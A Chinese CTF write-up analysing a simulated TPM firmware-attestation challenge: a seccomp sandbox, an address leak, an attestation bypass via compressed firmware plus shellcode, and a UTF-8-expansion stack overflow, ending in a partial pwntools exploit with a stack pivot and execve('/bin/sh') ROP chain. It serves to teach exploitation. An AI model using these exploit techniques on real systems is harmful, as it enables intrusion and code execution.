j_memcpy(hollow_and_jump_buffer, hollow_and_jump, 128LL);
if ( (unsigned int)mprotect(hollow_and_jump_buffer, 4096LL, 5LL) )
{
    perror("mprotect hollow logic region");
    return 1;
}
else if ( (unsigned int)install_seccomp_filter() )
{
    fwrite("Failed to isntall seccomp filter\n", 1LL, 33LL, stderr);
    return 1;
}
else
{
    hollow_and_jump_buffer(v15, v12, buffer);
    return 0;
}

程序将我们上传的shellcode读到了buffer中，然后通过一个mmap出来的hollow_and_jump_buffer函数跳转到buffer的逻辑上。同时这里注意，这个install_seccomp_filter会进行seccomp设置，设置的内容如下:

 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x01 0x00 0xc000003e  if (A == ARCH_X86_64) goto 0003
 0002: 0x06 0x00 0x00 0x00000000  return KILL
 0003: 0x20 0x00 0x00 0x00000000  A = sys_number
 0004: 0x15 0x00 0x01 0x00000000  if (A != read) goto 0006
 0005: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0006: 0x15 0x00 0x01 0x00000001  if (A != write) goto 0008
 0007: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0008: 0x15 0x00 0x01 0x0000002f  if (A != recvmsg) goto 0010
 0009: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0010: 0x15 0x00 0x01 0x0000000b  if (A != munmap) goto 0012
 0011: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0012: 0x06 0x00 0x00 0x00000000  return KILL

这里可以看出，程序只允许了四个系统调用

read
write
recvmsg
mummap

一开始的时候有一个想法：我们能不能直接上传一个文件，然后直接ORW，结果仔细看，这里没有允许open存在，那看来这个binary本身是没办法了。只能尝试从sfm处突破
逆向到此处，我们需要对这个题目的输出输出流与运行状态稍作总结：

最初的时候uploader与我们对接，而uploader启动了launcher，lancher启动了raw
此时我们的输入和输出会直接与launcher执行的raw对接
uploader创建了sfm进程，并且建立了socket通信，其中sock_server作为了sfm的stream
launcher接受了sock_client，并且将其拷贝为3，这个3继承给了raw
raw中使用3 fd与SFM_FD与sfm进行校验后，通过给sfm发送一个请求，重新将我们普通的数据输出流设定为1，2（与当前一致），然后进行通信

+----------+                  +-----------+                  +-----------+
| launcher |                  |    raw    |                  |    sfm    |
+----------+                  +-----------+                  +-----------+
     |            input             |          sock_client         |
     |       --------------->       |       --------------->       |
     |                              |                              |
     |            output            |          sock_server         |
     |       <---------------       |       <---------------       |
     |                              |                              |
     |                              |                              |
     |                              |                              |

RAW

这个RAW模块是一个作为例子的模块，raw与sfm的通信过程需要通过将raw逆向分析后，才能比较完整的理清楚这个过程。其中一个比较重的逻辑如下:

int __usercall main_function@(int sock_fd@, __int64 argument@, int std_fd@)
{
  puts_((unsigned int)std_fd, "Attested core booted...\n");
  while ( 1 )
  {
    LOWORD(buffer) = ' #';
    write(std_fd_1, (char *)&buffer, (int)&loc_1 + 1);
    *(_DWORD *)&input_buf[16] = 0;
    readline(std_fd, input_buf, 20i64);
    result = strcmp__(input_buf, "exit");
    if ( !result )
      break;
    if ( !strcmp__(input_buf, "identity") )
      identity(sock_fd, std_fd_1);
    if ( !strcmp__(input_buf, "quote") )
      quote();
    if ( !strcmp__(input_buf, "certify") )
      certify();
  }
  return result;
}

这里会有两个fd，一个是和sfm通信的sock，另一个则是用来和当前的标准输入输出流进行通信。后文的一些通信格式可以从这个binary中逆向得到。

SFM模块

sfm模块是这个题目最关键的模块，这个模块会初始化一个SFM(SecureFirewareModule)模块，用于提供SFM的一些操作接口（也就是我们的主要漏洞点）。整个SFM模块主要逻辑基本上围绕着对我们创建的SFM对象的相关操作。

这个模块初始化的时候，首先会先模拟了使用一种叫做(PCR)Platform Configuration Register的认证方式

这个认证方式源自于TPM（Trusted Platform Module）中，PCR表示一段存在TPM架构中的一段内存。通常情况下，被设定为安全软件和重要引导程序的程序会被计算其hash值，然后存放在这个PCR中。当不同的PCR关联到同一个hash库中的时候，会被认为叫做bank。每一个bank对应一种hash算法，一个PCR可以分配给多个bank。不同的软件可以使用不同的算法做测量，产生不同的摘要，这些摘要就会被扩展到对应的bank中。
在测量软件时，TPM仅仅用PCR来记录测量值。至于是否安全，这要到应用程序真正使用PCR用于policy授权的时候，或者是远程请求者请求一个签名认证（quote，引用）然后判定可信性。

在这个题目中，根据我们的执行情况，可以推断出前文raw程序执行的时候，一定是通过了PCRPolicy的认证。通过逆向raw的逻辑，可以得知，raw通过验证的办法，就是通过将自己的binary发送了过去，所以这个地方的PCRPolicy其实计算的就是trusted_firmware.raw的hash。这里其实模拟了一个认证绕过的问题，下文可以看到如何使用

接下来，程序给出了一些基本功能，包括

(1) 获取当前证书信息
(2) 更新bank的信息
(3) 创建一个SFM对象，并且指定其认证方式
(4) 修改当前SFM对象的基本属性，需要通过认证
(5) 对当前SFM对象进行证书签名
(6) 对sfm对象进行认证
(7) 建立安全的通信连接

其中，系统提供的raw在初始化的时候，会调用（2）（7），成功执行后才能够让raw接受我们用户侧的输入，并且能够传递给sfm。

get_firmware_data(3, 1i64, now_pc);
if ( establish_secure_io() < 0 )
  return 1;
main_function(3, std_fds, SHIDWORD(std_fds));

允许使用的功能只有(1) (5) (6)，简单逆向后会发现，这几个功能在正常初始化下基本上没有什么功能。因为这几个程序都在操作sfm初始化时候正常初始化的模块。显然，我们需要尝试创建或者修改对应的模块才能出发漏洞。

根据Rust语言的特性，rust本身出现漏洞的情况少之又少，所以我们首先快速的过一遍所有的unsafe部分，可以看到在sfm-sys这个模块下，存在着一些C语言的外部函数:

extern "C" {
    fn sfm_init_ek() -> *const EvpPkeyRsa;
    fn sfm_get_public_key(pkey: *const EvpPkeyRsa,
                          output: *mut u8) -> c_int;
    fn sfm_attest_to_quote(pkey: *const EvpPkeyRsa,
                           alg_id: u16,
                           banks: *const [u8; 64],
                           num_banks: usize,
                           output: *mut u8) -> c_int;
    fn sfm_certify_owner_record(pkey: *const EvpPkeyRsa,
                   owner_name: *const u8,
                   device_name: *const u8,
                   serial: u64,
                   timestamp: u32,
                   output: *mut u8) -> c_int;
    fn sfm_certify_key(pkey: *const EvpPkeyRsa,
                       key_data: *const u8,
                       output: *mut u8) -> c_int;
    fn sfm_certify_nv_storage(pkey: *const EvpPkeyRsa,
                              data: *const u8,
                              data_len: usize,
                              output: *mut u8) -> c_int;
}

这些外部函数很特别，首先题目中并没有给出他们的原型，其次是他们在被调用的时候，都有unsafe这个label存在，例如

pub fn get_public_key(&self) -> Option<Vec<u8>> {
    let mut out_buf = [0u8; 512];
    let err = unsafe {
        sfm_get_public_key(self.ek, out_buf.as_mut_ptr())
    };

    if err != 0 {
        None
    } else {
        Some(out_buf.to_vec())
    }
}

这些函数实现的内部仔细过了一遍，会发现有以下特征

大部分都使用了memcpy
结合程序传入参数和源码，可以得知这些函数都尝试将payload存放到栈上

这里我们以上文的get_public_key为例子，首先这个程序中的out_buf为一个指定大小的数组，其次其通过调用了.as_mut_ptr将自己声明为了可变的指针。在反汇编中如下:

_QWORD *__fastcall sfm_sys::SecureFirmwareModule::get_public_key(_QWORD *a1, __int64 *a2)
{
  void *v2; // rax
  void *v3; // r14
  char v5[536]; // [rsp+0h] [rbp-218h] BYREF

  memset(v5, 0, 0x200uLL);
  if ( (unsigned int)sfm_get_public_key(*a2, v5) )
  {
    a1[1] = 0LL;
  }
  else
  {
    _rust_alloc();
    if ( !v2 )
      alloc::alloc::handle_alloc_error::h07edb87aaab24c34();
    v3 = v2;
    memcpy(v2, v5, 0x200uLL);
    *a1 = 512LL;
    a1[1] = v3;
    a1[2] = 512LL;
  }
  return a1;
}

这里的v5就是上文的out_buf。

然后大致过了一遍所有的unsafe，会发现在certify和attest这个操作的时候，有可能会有一些异常行为。（因为剩下的unsafe包含的逻辑基本上是固定的了）

attest - 信息泄露

在TPM过程中，“attestation”（attest）是指证明一个系统或者设备的身份和完整性，确保它是可信的。这是通过TPM的一系列安全功能来实现的，包括数字签名、密钥管理和远程验证等机制。具体来说，TPM attestation过程中，系统或设备会向TPM发送请求，TPM会对其进行验证并生成一个证明（attestation），证明该系统或设备的身份和完整性。这个证明可以被其他系统或设备用来验证该系统或设备的可信性

逆向attest操作，会发现里面有一个很简单就能发现的信息泄露:

#[derive(Debug)]
pub enum SfmHashAlgorithm {
    HashAlgSha1   = 0,
    HashAlgSha256 = 1,
    HashAlgSha384 = 2,
    HashAlgSha512 = 3,
    HashAlgMax    = 4,
}
///
    fn attest_quote(&mut self, cmd: WithTrailer) -> SfmResult<bool> {
        let alg = cmd.alg_id;

        if alg > SfmHashAlgorithm::HashAlgMax as u16 {
            return Err(SfmError::InvalidAlgorithmType);
        }

        let report = self.sfm.attest(alg, self.banks.to_vec());

        self.stream.write_all(&report.ok_or(SfmError::SfmInternalError)?[..])?;
        Ok(true)
    }

在入口位置，程序校验了alg_id是否为有效的hash算法，这个HashAlgMax值为4.而在内部函数调用的时候:

result = EVP_MD_CTX_new();
v9 = result;
if ( gid == 2 )
{
  v10 = EVP_sha384();
  return sign_data(a1, v9, v10, a3, a4, a5);
}
if ( gid <= 2 )
{
  if ( gid )
    v10 = EVP_sha256();
  else
    v10 = EVP_sha1();
  return sign_data(a1, v9, v10, a3, a4, a5);
}
if ( gid == 3 )
{
  v10 = EVP_sha512();
  return sign_data(a1, v9, v10, a3, a4, a5);
}
return result;

这边值使用了gid<=3的情况，忘记了处理gid=4。所以当我们构造的请求满足gid=4的时候，这里的EVP_MD_CTX_new就会返回一个地址，从而泄露一个lib库的地址。

modify - 堆操作

NvStorage?

在certify函数中，基本上都存在内存拷贝的问题，因此我们可以考虑创建或者修改对象来实现溢出。首先我们来看到创建的流程

fn create_object(&mut self, cmd: WithTrailer) -> SfmResult<bool> {
    // first strip off the desired policy
    let policy_header = SfmAuthorizationPolicy::parse_with_trailer(cmd.get_trailer())
        .ok_or(SfmError::InvalidAuthPolicy)?;
    // skip some code..

    // create the object, return the id
    let object: Option = match cmd.get_object_type().try_into() {
        // OwnershipRecord is not a creatable object type
        Ok(SfmObjectType::OwnershipRecord) => None,
        Ok(SfmObjectType::Key) => {
            let mut key_data = [0u8; 32];
            rand::thread_rng().fill_bytes(&mut key_data);
            Some(SfmObject::Key(Aes256Key { key_data } ))
        },
        Ok(SfmObjectType::NvStorage) => {
            let nv_storage_raw = NvStorageRaw::parse_with_trailer(policy_header.get_trailer())
                .ok_or(SfmError::InvalidObjectValue(SfmObjectType::NvStorage))?;

            let size = nv_storage_raw.size as usize;
            if size > 1024 {
                Err(SfmError::InvalidObjectValue(SfmObjectType::NvStorage))?;
            }
            Some(SfmObject::NvStorage(nv_storage_raw.get_trailer()[..size].to_vec()))
        }
        _ => None
    }
    let response_id = if let Some(object) = object {
        let object_with_policy = ObjectStoreItem {
            policy: policy,
            item: object
        };
        self.object_store.insert(self.last_object_id, object_with_policy);
        self.last_object_id.checked_add(1).expect("Object ID count overflowed");
        self.last_object_id - 1
    } else {
        eprintln!("Invalid object found");
        return Err(SfmError::InvalidObjectType(cmd.get_object_type()));
    };

}

这里又要提一个细节：这边创建内存的时候，使用的是parse_with_trailer这个接口，这个接口的实现如下:

pub trait JustBytes {
    /// parse and return a reference to the underlying data and the trailer
    fn parse_with_trailer(bytes: &[u8]) -> OptionSelf>>
        where Self: Sized;

    /// construct a new copy of Self using `bytes` as a source
    fn new_from_bytes(bytes: &[u8]) -> Option<Self>
        where Self: Sized;
}

impl JustBytes for T {

    fn parse_with_trailer(bytes: &[u8]) -> Option>
      where Self: Sized
    {
        let (content, trailer) = LayoutVerified::<&[u8], Self>::new_from_prefix(bytes)?;
        Some(WithTrailer::{ inner: content.into_ref(), trailer })
    }
    
    fn new_from_bytes(bytes: &[u8]) -> Option<Self>
      where Self: Sized
    {
        Self::read_from(bytes)
    }
}

这边可以看到，这个trait为所有从AsBytes和FromBytes派生的对象实现了接口parse_with_trailer和new_from_bytes这两个接口，前者要求传入的字符串长度对齐T的最小align值，后者要求传入的bytes大小正好为T的大小。所以这两个接口基本上为序列化操作。

回到刚刚函数部分，这里NvStorage可以通过传入的字符串进行序列化。Rust实现序列化的时候，是自动的将内存填充到结构体中，而NvStorage相关结构体如下

#[repr(C)]
#[derive(Debug, AsBytes, FromBytes)]
pub struct NvStorageRaw {
    pub size: u16,
}
#[derive(Debug)]
pub enum SfmObject {
    OwnershipRecord(OwnershipRecord),
    Key(Aes256Key),
    NvStorage(Vec<u8>),
}

这里我们能控制NvStorageRaw中的size大小，以及对应写入的大小。然而这里的size在代码中限制最大值仅为1024，大小非常有限，在certify过程中，相关代码如下:

let mut out_buf = [0u8; MAX_NV_STORAGE_CERT_SIZE]; //0x500

  let err = unsafe {
      sfm_certify_nv_storage(self.ek,
                             data.as_ptr(),
                             data.len(),
                             out_buf.as_mut_ptr())
  };

可以看到溢出长度不够，只能使用其他对象。不过这边的NvStoargeRaw可以由用户控制塞入任意的1024字节，这点可以稍微记一下。

其他对象中，Key的长度也是属于无法发生溢出的情况，于是只能考虑OwnershipRecord

OwnershipRecord - 栈溢出 - Part1

OwnershipRecord这个对象首先无法在create_object中创建:

let object: Option = match cmd.get_object_type().try_into() {
    // OwnershipRecord is not a creatable object type
    Ok(SfmObjectType::OwnershipRecord) => None,
}

从代码中可以看出，即使我们选择这个对象，它也是不会创建的。然而在sfm初始化的时候，实际上就创建过一个OwnershipRecord对象:

let res = object_store.insert(0,
    ObjectStoreItem {
        policy: pcr_policy.clone(),
        item: SfmObject::OwnershipRecord (
            ownership_record
        )
    }
);

因此我们可以考虑直接修改这个对象，从而考虑是否构成危险。它可以在modify中被修改:

fn modify_object(&mut self, cmd: WithTrailer) -> SfmResult<bool> {
        let idx = cmd.get_object_index();

        // look up object
        let entry = self.object_store.get_mut(&idx.into())
            .ok_or(SfmError::InvalidObjectIndex(idx))?;

        let policy_header = SfmAuthorizationPolicy::parse_with_trailer(cmd.get_trailer())
            .ok_or(SfmError::InvalidAuthPolicy)?;

        let (authorized, trailer) = match entry.policy {
            // just look at here
            AuthorizationPolicy::PcrPolicy(desired_state) => {
                (self.banks == desired_state, cmd.get_trailer())
            },
        };

        if !authorized {
            return Err(SfmError::FailedAuth);
        }
        // modify according to type and set fields
        let new_object = match entry.item {
            SfmObject::OwnershipRecord(_) => {
                SfmObject::OwnershipRecord(
                  OwnershipRecordRaw::new_from_bytes(trailer)
                  .ok_or(SfmError::InvalidObjectValue(SfmObjectType::OwnershipRecord))?
                  .into()
                )
            }
            }
        };

        let new_entry = ObjectStoreItem {
            policy: entry.policy,
            item: new_object
        };

        *entry = new_entry;
    }

然而修改这个对象，我们需要让我们的bank与desired_state相等，而这一步相当于是认证通过。这段其实模拟了TPM检测固件hash的过程，在未认证通过的情况下，没有办法修改OwnershipRecord。。。。吗？

认证绕过

上文提到的漏洞点虽然存在，但是需要想办法进行认证绕过，然而从题目可知，这个绕过需要比对desired_state和bank相等，这个逻辑要怎么绕过呢？

程序提供了一个叫做integrity_bank_update的函数:

fn integrity_bank_update(&mut self, cmd: WithTrailer) -> SfmResult<bool> {
    let bank_index = cmd.get_bank_index() as usize;

    if bank_index >= self.banks.len() {
        eprintln!("Invalid bank index specified");
        return Ok(false);
    }

    let mut hasher = Sha512::new();
    hasher.update(&self.banks[bank_index][..]);
    hasher.update(cmd.get_data());

    self.banks[bank_index] = hasher.finalize().into();

    self.stream.write_all(&(0_u32.to_le_bytes()))?;
    Ok(true)
}

这个程序模拟了TPM更新hash的流程，由于开始的时候bank被初始化成了空值，所以在这边我们需要发送请求，将对应的bank更新。而只有更新为trusted_firmware.raw的hash值，的是偶，才能实现认证！

这里我们来仔细分析一下程序设计：对于TPM而言，此时它需要对我们的程序hash进行检测，从而保证我们的固件没有被修改。然而可能是出于一些特定的原因（例如当binary过大的时候，整体hash可能耗时太长）程序并未将整个binary进行hash并且检测，而是每1024个字节进行一次hash，最后比较整个hash数组，确保是否发生改变

为了保证权限隔离，TPM的验证程序sfm肯定是无法直接接触到launcher送上来的raw firmware，所以两者之间使用了一个unix socket，模拟一种进程间隔离的情况下进行的通信检查，并且使用了看似合理的检查方式：上传的固件大小为8192，而sfm检查的时候，正好需要计算8段1024字节大的数据

trusted_firmware是通过将自身的binary发送过去，从而实现的认证。从这个角度看，当我们企图修改trusted_firmware中的任意一个字节，都将无通过校验；同时，如果我们尝试创建自己的binary，我们就会无法通过验证，看似是卡死了作弊的可能。


┌──────────────┐           ┌──────────┐
│              │           │          │
│     8192     │           │   SFM    │
│              │           │          │
│              │           │          │
│              │           │          │
│              ├──────────►│          │
│              │           │          │
│              │           │          │
│              │           │          │
│              │           │          │
│              │           │          │
│              │           │          │
└──────────────┘           └──────────┘

然而上述的安全逻辑之下却隐藏了一种可能：假设我们实现将trusted_firmare进行压缩之后，塞入新的逻辑，其中当校验过程发生时，将对应的内容解压，这样我们就能在能够完成认证的同时，又引入自己的新的恶意逻辑！：

+--------------+           +----------+
|              |           |          |
|     8192     |           |   SFM    |
|              |           |          |
|   compress   |           |          |
|              |           |          |
+--------------+---------->|          |
|              |           |          |
|              |           |          |
|   shellcode  |           |          |
|              |           |          |
|              |           |          |
|              |           |          |
+--------------+           +----------+

于是在这种情况下，我们就能在完成认证的同时，实现自己的恶意代码攻击！

OwnershipRecord - 栈溢出 - Part2

当我们实现了认证之后，便可尝试触发下列代码实现更改OwnershipRecord:

SfmObject::OwnershipRecord(_) => {
    SfmObject::OwnershipRecord(
        OwnershipRecordRaw::new_from_bytes(trailer)
        .ok_or(SfmError::InvalidObjectValue(SfmObjectType::OwnershipRecord))?
        .into()
    )
}

这里有一个细节：之前我们提到过,SfmObject::OwnershipRecord这个enum类型使用的是OwnershipRecord这个结构体，然而这边却是使用了OwnershipRecordRaw这个结构体的new_from_bytes进行的反序列化，这两者之间如何转换的呢？

于是这边检查相关结构体:

#[repr(C)]
#[derive(Debug, AsBytes, FromBytes)]
pub struct OwnershipRecordRaw {
    pub country_code: [u8; 2],
    pub _padding: [u8; 2],
    pub owner_name: [u8; 64],
    pub device_name: [u8; 16],
    pub serial_number: [u8; 8],
    pub creation_date: u32,
}

impl From for OwnershipRecord {
    fn from(item: OwnershipRecordRaw) -> Self {
        Self {
            country_code: String::from_utf8_lossy(&item.country_code[..]).to_string(),
            owner_name: String::from_utf8_lossy(&item.owner_name[..]).to_string(),
            device_name: item.device_name,
            serial_number: item.serial_number,
            creation_date: item.creation_date
        }
    }
}

这个地方有一个很有意思的地方：OwnershipRecord实现了一个接口，这个接口是针对OwnershipRecordRaw对象的From，这个接口的说明根据Rust官方网站说明

The From trait allows for a type to define how to create itself from another type, hence providing a very simple mechanism for converting between several types.
The Into trait is simply the reciprocal of the From trait. That is, if you have implemented the From trait for your type, Into will call it when necessary.
The From and Into traits are inherently linked, and this is actually part of its implementation. It means if we write something like this: impl From for U, then we can use let u: U = U::from(T) or let u:U = T.into().

在这个代码中，当一个OwnershipRecordRaw调用into()函数的时候，上述代码就会自动触发。由于new_from_bytes为精准的反序列化过程，也就是说会严格按照OwnershipRecordRaw结构体大小进行反序列化，因此这些字符串基本上无法出现溢出。

然而注意这里的from_utf8_lossy函数，这个函数其实是一个处理utf8的函数，如果遇到普通的ascii，这个函数会把对应的字符串直接翻译，但是如果遇到了ascii以外的字符串，其行为会是怎么样的呢？，这里检查官方文档:

Strings are made of bytes (u8), and a slice of bytes (&[u8]) is made of bytes, so this function converts between the two. Not all byte slices are valid strings, however: strings are required to be valid UTF-8. During this conversion, from_utf8_lossy() will replace any invalid UTF-8 sequences with U+FFFD REPLACEMENT CHARACTER

官方文档提到，当我们传入的字符串为非UTF-8的形式的时候，这里的字符串会被添加FF FD两个多余的字符（并且替换掉原来的字符为替代字符）！换句话说，虽然这里的country_code或者owner_name会因为反序列化的要求，长度局限为2和64，然而会因为添加了ff fd多余的字符，长度变为现在的3倍！

接下来看到对应的certify功能：

pub fn certify_ownership_record(&mut self,
                                owner_name: &[u8],
                                device_name: &[u8],
                                serial: u64,
                                timestamp: u32) -> Option<Vec<u8>> {
    let mut out_buf = [0u8; MAX_OWNERSHIP_CERT_SIZE]; // 380

    let err = unsafe {
        sfm_certify_owner_record(self.ek,
                                    owner_name.as_ptr(),
                                    device_name.as_ptr(),
                                    serial,
                                    timestamp,
                                    out_buf.as_mut_ptr())
    };

    if err != 0 {
        None
    } else {
        Some(out_buf.to_vec())
    }
}

这个栈上的变量有380字节的空余，我们这个结构体OwnershipRecordRaw只有96字节，不足以构成溢出。转换后的OwnershipRecord大小大差不差（多了一点string的结构体），不过我们需要进一步看一下内部逻辑:

  owner_cert = create_owner_cert(owner_name, device_name, serial, &cnt);
  if ( owner_cert )
  {
    v9 = EVP_MD_CTX_new();
    if ( v9 )
    {
      v10 = EVP_sha256();
      v11 = EVP_DigestSignInit(v9, 0LL, v10, 0LL, a1);
      if ( v11 == 1 )
      {
        if ( (unsigned int)EVP_DigestSignUpdate(v9, owner_cert, cnt) == 1 )
        {
          v11 = EVP_DigestSignFinal(v9, 0LL, (__int64)n);
          if ( v11 == 1 )
          {
            v14 = CRYPTO_malloc(n[0], "vendor/sfm/src/main.c", 292LL);
            v12 = (const void *)v14;
            if ( v14 )
            {
                /// skip code...

void* create_owner_cert(char *owner_name, char *device_name, char *serial, _QWORD *a4)
{
  result = malloc(0x10uLL);
  ptr[0] = result;
  if ( result )
  {
    *a4 = 16LL;
    *result = serial;
    *((_DWORD *)ptr[0] + 2) = time(0LL);
    if ( (unsigned int)append_kv_to_cert(ptr, a4, "O=", owner_name)
      || (unsigned int)append_separator_to_cert(ptr, a4, ",")
      || (appended = append_kv_to_cert(ptr, a4, "CN=", device_name), result = ptr[0], appended) )
    {
      free(ptr[0]);
      return 0LL;
    }
  }
  return result;
}

__int64 __fastcall append_kv_to_cert(void **a1, _QWORD *a2, const char *label, const char *in_buf2)
{
  v6 = strlen(label);
  total_len = strlen(in_buf2) + v6;
  v8 = (char *)realloc(*a1, total_len + *a2 + 1);
  if ( !v8 )
    return 1LL;
  v9 = v8;
  strcpy(&v8[*a2], label);
  lable_len = strlen(label);
  strcpy(&v9[*a2 + lable_len], in_buf2);
  *a1 = v9;
  result = 0LL;
  *a2 += total_len;
  return result;
}

可以看到，这边实际上拷贝了两个东西，一个是加密后的hash值，另一个是调用create_owner_cert创建的结构体。整体的hash其实是在对create_owner_cert算出来的值进行hash，而这个owner_cert对象其实就是我们传入的OwnershipRecord，并且添加了一些证书结构体。注意到这里的append_kv_to_cert函数底层实现实际上使用的是strcpy进行的数据拷贝，也就是说由于utf-8编码导致的内存扩展的漏洞现象会保留。
其中根据调试可以知道，当我们把所有的字符串填满的情况下，hash值实际上有0x100字节那么大，此时拷贝逻辑如下:

if ( (unsigned int)EVP_DigestSignFinal(v9, v14, (__int64)n) == 1 )
{
    v15 = n[0];
    memcpy(out_buf, v12, n[0]);
    v16 = &out_buf[v15];
    v11 = 0;
    memcpy(v16, owner_cert, cnt);
}

由于我们之前进行了内存扩展，此时的owner_cert已经远超96字节。以device_name填满0xff为例子，此时的大小已经达到了224字节！于是必定可以进行栈溢出攻击。根据调试，我们塞入一定量后的0xff，并且拼入一些B字符到device_name，可以得到如下的结果:

0x7fffb2493a88: 0xbdbfefbdbfefbdbf      0xbfefbdbfefbdbfef                 
0x7fffb2493a98: 0xefbdbfefbdbfefbd      0xbdbfefbdbfefbdbf                 
0x7fffb2493aa8: 0xbfefbdbfefbdbfef      0xefbdbfefbdbfefbd
0x7fffb2493ab8: 0xbdbfefbdbfefbdbf      [0x4242424242424242] <---- rpb
0x7fffb2493ac8: 0x432c424242424242      0x4141414141413d4e
                ^^^^^^^^^^^^^^^^^                     ^^^^
                ret address                        here is struct header

此时我们就有了栈溢出的攻击原语

内存布局构造

检查sfm可以知道，这个程序开启了所有的保护:

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled

由于我们现在存在ROP的手段，同时又有一个泄露数据的办法，我们可以先检查泄露的数据中会包含什么。

00000000  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  │····│····│····│····│
*
00000040  00 00 00 00  00 00 00 00  21 00 00 00  00 00 00 00  │····│····│!···│····│
00000050  01 00 00 00  00 00 00 00  90 d9 cb 68  89 7f 00 00  │····│····│···h│····│
00000060  20 f4 d6 68  89 7f 00 00  21 00 00 00  00 00 00 00  │ ··h│····│!···│····│
00000070  02 00 00 00  00 00 00 00  df ee cb 68  89 7f 00 00  │····│····│···h│····│
00000080  c0 b2 d6 68  89 7f 00 00  21 00 00 00  00 00 00 00  │···h│····│!···│····│
00000090  20 a6 5a 7e  c4 55 00 00  10 cb 5a 7e  c4 55 00 00  │ ·Z~│·U··│··Z~│·U··│
000000a0  db 0b 89 64  00 00 00 00  21 00 00 00  00 00 00 00  │···d│····│!···│····│
000000b0  02 00 00 00  00 00 00 00  cf 10 cc 68  89 7f 00 00  │····│····│···h│····│
000000c0  c0 84 d6 68  89 7f 00 00  21 00 00 00  00 00 00 00  │···h│····│!···│····│
000000d0  02 00 00 00  00 00 00 00  48 11 cc 68  89 7f 00 00  │····│····│H··h│····│
000000e0  c0 6b d6 68  89 7f 00 00  21 00 00 00  00 00 00 00  │·k·h│····│!···│····│
000000f0  90 a4 5a 7e  c4 55 00 00  00 00 00 00  00 00 00 00  │··Z~│·U··│····│····│
00000100  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  │····│····│····│····│

根据简单的观察可知，这里写漏了一个lib地址，为libcrypto.so.3的一个固定地址，这个library题目中有给出，因此我们可以尝试利用这个构造ROP。
然而根据之前溢出条件来看，程序最多可以控制的溢出只有ret地址和rpb处，因为这个结构体存在一些其他tag，导致如果我们尝试控制了ret地址之后，其他的地址可能就不好控制了。
不过，我们从泄露的数据中还能看到一点heap的地址，那这里我们考虑到之前create_object可以塞入任意数据的事情，可以考虑做一个栈迁移，让我们的rsp指针跳转到堆上。
首先，我们创建一个堆

+--------------+
|              |
|              |
|              |
|              |
|              |
| NvStorage    |
+--------------+

此时，我们的栈修改如下:

+--------------+          +----------------+
|              |<---+     |                |
|              |    |     |                |
|              |    |     |                |
|              |    |     |                |
|              |    |     |                |
| NvStorage    |    |     |                |
+--------------+    |     |                |
                    |     |                |
                    |     |                |
                    |     |                |
                    |     |                |
                    |     | pop rsp ret;   |
                    |     |                |
                    +-----+ NvStorage Addr |
                          +----------------+

这样就能让rsp指向NvStorage分配的内存中，从而保证有充足的空间存放ROP链。
同时，我们使用ropper这个工具，即可快速的生成可以利用的ROP链

1	ropper -f .\libcrypto.so.3 --chain execve

考虑到整个程序攻击流程比较长（需要上传一个自己的固件，然后让固件与sfm通信），这里考虑先用pwntools模拟这个固件，写出相关的攻击流程，然后再办法将其转换成C代码。为了让其能够正常运行，我们需要有一些前置工作：

由于这个sfm使用的句柄来自环境变量，所以我们可以使用socket.sockpair来创建一对通信句柄，让其中一个句柄可被继承，然后设置为环境变量，即可实现通信。
需要对sfm这个binary使用patchelf，让其能够从我们指定的目标目录下进行libc的查找。

完成准备工作后，我们可以写出当前漏洞的利用脚本:

from pwn import *
import socket
import os

sfm_fd, client_fd = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
os.set_inheritable(sfm_fd.fileno(), True)
p = process("./sfm", env = {'FIRMWARE_FD': str(sfm_fd.fileno()), 
                            }, 
                            close_fds=False
            )

context.log_level = 'debug'
context.terminal = ['tmux','splitw','-h']
# gdb.attach(p,'b sfm_attest_to_quote')
gdb.attach(p,'b sfm_certify_owner_record')
# gdb.attach(p)
print(client_fd.recv(4))
client_fd.send(b"SFMI")

fw = open('./trusted_firmware', 'rb')
content = fw.read()

for i in range(0, len(content), 1024):
    # Update_Banks
    cmd = p32(0) + p16(1) + p16(0)
    # bank_index _padding
    cmd += p16(1) + p16(0)
    # data
    cmd += content[i:i+1024]
    client_fd.send(cmd)
    print(client_fd.recv(4))

# AttestQuote
cmd = p32(0) + p16(7) + p16(0)
# hash id
cmd += p16(4)

client_fd.send(cmd)
data = client_fd.recv(512)
print(hexdump(data))
libcrypt = u64(data[0x58:0x60]) - 0x347990
print(hex(libcrypt))
leak_heap = u64(data[0x90:0x98])
print(hex(leak_heap))
exp_rop_addr = leak_heap - 0x11620 + 0x18610
print(hex(exp_rop_addr))

# 0x55ce41b57620 - 0x000055ce41b46000 + (0x55ce41b5e610 -0x000055ce41b46000)

# Stack Pivot to heap
# 0x00000000000b726c : pop rsp ; ret
# Ropper
# 0x00000000000d46c7 : pop rax ; ret
# 0x000000000011ce96 : syscall
pop_rsp_ret = p64(libcrypt + 0xb726c)
pop_rax_ret = p64(libcrypt + 0xd46c7)
pop_rcx_ret = p64(libcrypt + 0x1bb813)
mov_rcx_rax_ret = p64(libcrypt + 0x114c45)
pop_rdi_ret = p64(libcrypt + 0xb71db)
pop_rsi_ret = p64(libcrypt + 0xba534)
pop_rdx_ret = p64(libcrypt + 0x2b89d3)
syscall = p64(libcrypt + 0x11ce96)
data_segment = p64(libcrypt + 0x43D000)
data_8_segment = p64(libcrypt + 0x43D008)


exp_rop = pop_rax_ret
exp_rop += b"//bin/sh"
exp_rop += pop_rcx_ret
exp_rop += data_segment
exp_rop += mov_rcx_rax_ret
exp_rop += pop_rax_ret
exp_rop += p64(0)
exp_rop += pop_rcx_ret
exp_rop += data_8_segment
exp_rop += mov_rcx_rax_ret
exp_rop += pop_rdi_ret
exp_rop += data_segment
exp_rop += pop_rsi_ret
exp_rop += data_8_segment
exp_rop += pop_rdx_ret
exp_rop += data_8_segment
exp_rop += pop_rax_ret
exp_rop += p64(0x3b)
exp_rop += syscall
exp_rop = exp_rop.ljust(1024,b'A')
# print(len(exp_rop))

#  ---- create object
# SfmCreateObject
cmd = p32(0) + p16(2) + p16(0) 
